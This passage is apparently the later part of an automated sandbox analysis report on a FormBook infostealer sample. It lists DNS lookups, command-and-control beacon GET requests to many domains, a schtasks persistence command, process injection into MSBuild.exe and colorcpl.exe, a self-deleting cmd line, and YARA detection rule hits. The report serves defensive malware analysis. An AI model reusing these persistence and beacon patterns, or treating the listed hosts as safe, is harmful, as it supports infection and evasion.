                                                        Aug 3, 2021 19:27:51.360105038 CEST8.8.8.8192.168.2.40xeaccNo error (0)www.goldenstatelabradoodles.comgoldenstatelabradoodles.comCNAME (Canonical name)IN (0x0001)
                                                        Aug 3, 2021 19:27:51.360105038 CEST8.8.8.8192.168.2.40xeaccNo error (0)goldenstatelabradoodles.com34.102.136.180A (IP address)IN (0x0001)
                                                        Aug 3, 2021 19:27:56.552784920 CEST8.8.8.8192.168.2.40x2e7bNo error (0)www.mynjelderlaw.com74.208.236.212A (IP address)IN (0x0001)
                                                        Aug 3, 2021 19:28:01.900547028 CEST8.8.8.8192.168.2.40xbd27No error (0)www.narrowpathwc.comnarrowpathwc.comCNAME (Canonical name)IN (0x0001)
                                                        Aug 3, 2021 19:28:01.900547028 CEST8.8.8.8192.168.2.40xbd27No error (0)narrowpathwc.com160.153.136.3A (IP address)IN (0x0001)
                                                        Aug 3, 2021 19:28:07.008965969 CEST8.8.8.8192.168.2.40xb7f8No error (0)www.teamtacozzzz.comteamtacozzzz.comCNAME (Canonical name)IN (0x0001)
                                                        Aug 3, 2021 19:28:07.008965969 CEST8.8.8.8192.168.2.40xb7f8No error (0)teamtacozzzz.com34.102.136.180A (IP address)IN (0x0001)
                                                        Aug 3, 2021 19:28:12.199184895 CEST8.8.8.8192.168.2.40x498eNo error (0)www.theredcymbalsco.comtheredcymbalsco.comCNAME (Canonical name)IN (0x0001)
                                                        Aug 3, 2021 19:28:12.199184895 CEST8.8.8.8192.168.2.40x498eNo error (0)theredcymbalsco.com184.168.131.241A (IP address)IN (0x0001)

                                                        HTTP Request Dependency Graph

                                                        • www.thefitflect.com
                                                        • www.braun-mathematik.online
                                                        • www.mariasmoworldwide.com
                                                        • www.goldenstatelabradoodles.com
                                                        • www.mynjelderlaw.com
                                                        • www.narrowpathwc.com
                                                        • www.teamtacozzzz.com
                                                        • www.theredcymbalsco.com

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.44976523.227.38.7480C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Aug 3, 2021 19:27:35.354372025 CEST7506OUTGET /n8ba/?YDKPpTg0=OvBvP1Su9fWFY0UPkW0anmpJM9mANCcukNJzgBj3kCnMbGPnYOnff5N4Ec4XgmlqGLmb&FHtx=1bcPl8l0PFatcZcp HTTP/1.1
                                                        Host: www.thefitflect.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Aug 3, 2021 19:27:35.434938908 CEST7507INHTTP/1.1 403 Forbidden
                                                        Date: Tue, 03 Aug 2021 17:27:35 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        X-Sorting-Hat-PodId: -1
                                                        X-Request-ID: b76a7661-5d65-4783-b7ab-d1f31283352c
                                                        X-XSS-Protection: 1; mode=block
                                                        X-Download-Options: noopen
                                                        X-Content-Type-Options: nosniff
                                                        X-Permitted-Cross-Domain-Policies: none
                                                        X-Dc: gcp-europe-west1
                                                        CF-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 679141ee0b9fc286-FRA
                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                        Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73
                                                        Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;dis


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        1192.168.2.449767217.160.0.12980C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Aug 3, 2021 19:27:40.513294935 CEST7522OUTGET /n8ba/?YDKPpTg0=+h7Xj+nXKVKiaIR46Fq1cf2yPuoKyU42UFvvfLIT79wfatbgIi2aH2e1i+WvrVB3N3qO&FHtx=1bcPl8l0PFatcZcp HTTP/1.1
                                                        Host: www.braun-mathematik.online
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Aug 3, 2021 19:27:40.818365097 CEST7523INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Date: Tue, 03 Aug 2021 17:27:40 GMT
                                                        Server: Apache
                                                        X-Powered-By: PHP/7.4.21
                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                        Link: <http://braun-mathematik.de/wp-json/>; rel="https://api.w.org/"
                                                        Data Raw: 34 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 0a 09 3c 68 65 61 64 3e 0a 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a
                                                        Data Ascii: 4e<!DOCTYPE html><html class="no-js" lang="de-DE"><head><meta charset="


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        2192.168.2.449769162.241.85.22780C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Aug 3, 2021 19:27:46.136246920 CEST7533OUTGET /n8ba/?YDKPpTg0=gDLflU22h4aNrBeOW4VXQ696ddSmWDeh6I9xRo3nz/h3BsDrL/4ZQIL6r35kaA0glkfe&FHtx=1bcPl8l0PFatcZcp HTTP/1.1
                                                        Host: www.mariasmoworldwide.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Aug 3, 2021 19:27:46.284780979 CEST7534INHTTP/1.1 404 Not Found
                                                        Date: Tue, 03 Aug 2021 17:27:46 GMT
                                                        Server: Apache
                                                        Upgrade: h2,h2c
                                                        Connection: Upgrade, close
                                                        Last-Modified: Wed, 24 Feb 2021 15:55:30 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 583
                                                        Vary: Accept-Encoding
                                                        Content-Type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 5f 73 6b 7a 5f 70 69 64 20 3d 20 22 39 50 4f 42 45 58 38 30 57 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 6a 73 69 6e 69 74 2e 64 69 72 65 63 74 66 77 64 2e 63 6f 6d 2f 73 6b 2d 6a 73 70 61 72 6b 5f 69 6e 69 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 69 64 3d 22 73 6b 2d 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        3192.168.2.44977034.102.136.18080C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Aug 3, 2021 19:27:51.383399963 CEST7535OUTGET /n8ba/?YDKPpTg0=e60qEcsD/l81wB0bMHsW7u7BjuDaTcxFYqyxe5BzllGz/xR5NT7a3L6d+84tw9tNKT87&FHtx=1bcPl8l0PFatcZcp HTTP/1.1
                                                        Host: www.goldenstatelabradoodles.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Aug 3, 2021 19:27:51.497190952 CEST7536INHTTP/1.1 403 Forbidden
                                                        Server: openresty
                                                        Date: Tue, 03 Aug 2021 17:27:51 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 275
                                                        ETag: "6104831f-113"
                                                        Via: 1.1 google
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        4192.168.2.44977174.208.236.21280C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Aug 3, 2021 19:27:56.692974091 CEST7538OUTGET /n8ba/?YDKPpTg0=j7TP3kg+SFNkJlLKMby/j4R6QZto1j85Usiv6TCoiWa/2cyAi3BRSjJegq0lHS5IvzJL&FHtx=1bcPl8l0PFatcZcp HTTP/1.1
                                                        Host: www.mynjelderlaw.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Aug 3, 2021 19:27:56.830612898 CEST7538INHTTP/1.1 302 Found
                                                        Content-Type: text/html
                                                        Content-Length: 0
                                                        Connection: close
                                                        Date: Tue, 03 Aug 2021 17:27:56 GMT
                                                        Server: Apache
                                                        Cache-Control: no-cache
                                                        Location: http://cornicklaw.com/n8ba/?YDKPpTg0=j7TP3kg+SFNkJlLKMby/j4R6QZto1j85Usiv6TCoiWa/2cyAi3BRSjJegq0lHS5IvzJL&FHtx=1bcPl8l0PFatcZcp


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        5192.168.2.449772160.153.136.380C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Aug 3, 2021 19:28:01.928575993 CEST7540OUTGET /n8ba/?YDKPpTg0=RqoVB/kRDotnM81a68VGCKAD0SwVXhGBA2hw7fPCanVTcO/r0wYF2QFNLO8vRrR2bvla&FHtx=1bcPl8l0PFatcZcp HTTP/1.1
                                                        Host: www.narrowpathwc.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Aug 3, 2021 19:28:01.957283974 CEST7540INHTTP/1.1 400 Bad Request
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        6192.168.2.44977334.102.136.18080C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Aug 3, 2021 19:28:07.027829885 CEST7541OUTGET /n8ba/?YDKPpTg0=uqosld0xCubOoSnMdKEGpsNAFVDy7sF9Olr0VLFZOqMlxplbtWpRciavlLjLwEv6WKyy&FHtx=1bcPl8l0PFatcZcp HTTP/1.1
                                                        Host: www.teamtacozzzz.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Aug 3, 2021 19:28:07.141590118 CEST7542INHTTP/1.1 403 Forbidden
                                                        Server: openresty
                                                        Date: Tue, 03 Aug 2021 17:28:07 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 275
                                                        ETag: "6104856e-113"
                                                        Via: 1.1 google
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7192.168.2.449774184.168.131.24180
                                                        TimestampkBytes transferredDirectionData
                                                        Aug 3, 2021 19:28:12.376934052 CEST7542OUTGET /n8ba/?YDKPpTg0=9vokcWjvDccQU4MCm09VADFSZD35cLZafv0mNDf58+cuq+V2woxjt+NJE4WV9inYEz7b&FHtx=1bcPl8l0PFatcZcp HTTP/1.1
                                                        Host: www.theredcymbalsco.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:


                                                        Code Manipulations

                                                        Statistics

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Start time:19:26:01
                                                        Start date:03/08/2021
                                                        Path:C:\Users\user\Desktop\Purchase Requirements.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\Desktop\Purchase Requirements.exe'
                                                        Imagebase:0x500000
                                                        File size:774656 bytes
                                                        MD5 hash:5BD387D81D1D7D7FD4DBEABEBBB46B1B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.697236239.0000000003CE6000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.697236239.0000000003CE6000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.697236239.0000000003CE6000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:low

                                                        General

                                                        Start time:19:26:14
                                                        Start date:03/08/2021
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UCnSWpQKXBXg' /XML 'C:\Users\user\AppData\Local\Temp\tmp47B.tmp'
                                                        Imagebase:0xf30000
                                                        File size:185856 bytes
                                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:19:26:14
                                                        Start date:03/08/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff724c50000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:19:26:15
                                                        Start date:03/08/2021
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                        Imagebase:0x900000
                                                        File size:261728 bytes
                                                        MD5 hash:D621FD77BD585874F9686D3A76462EF1
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.769097230.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.769097230.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.769097230.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.769766552.00000000010F0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.769766552.00000000010F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.769766552.00000000010F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:moderate

                                                        General

                                                        Start time:19:26:19
                                                        Start date:03/08/2021
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Explorer.EXE
                                                        Imagebase:0x7ff6fee60000
                                                        File size:3933184 bytes
                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:19:26:51
                                                        Start date:03/08/2021
                                                        Path:C:\Windows\SysWOW64\colorcpl.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\colorcpl.exe
                                                        Imagebase:0x60000
                                                        File size:86528 bytes
                                                        MD5 hash:746F3B5E7652EA0766BA10414D317981
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.920407109.00000000041B0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.920407109.00000000041B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.920407109.00000000041B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.919573194.0000000000210000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.919573194.0000000000210000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.919573194.0000000000210000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.920195745.0000000002AF0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.920195745.0000000002AF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.920195745.0000000002AF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:moderate

                                                        General

                                                        Start time:19:26:56
                                                        Start date:03/08/2021
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
                                                        Imagebase:0x11d0000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:19:26:56
                                                        Start date:03/08/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff724c50000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Disassembly

                                                        Code Analysis

                                                        Reset < >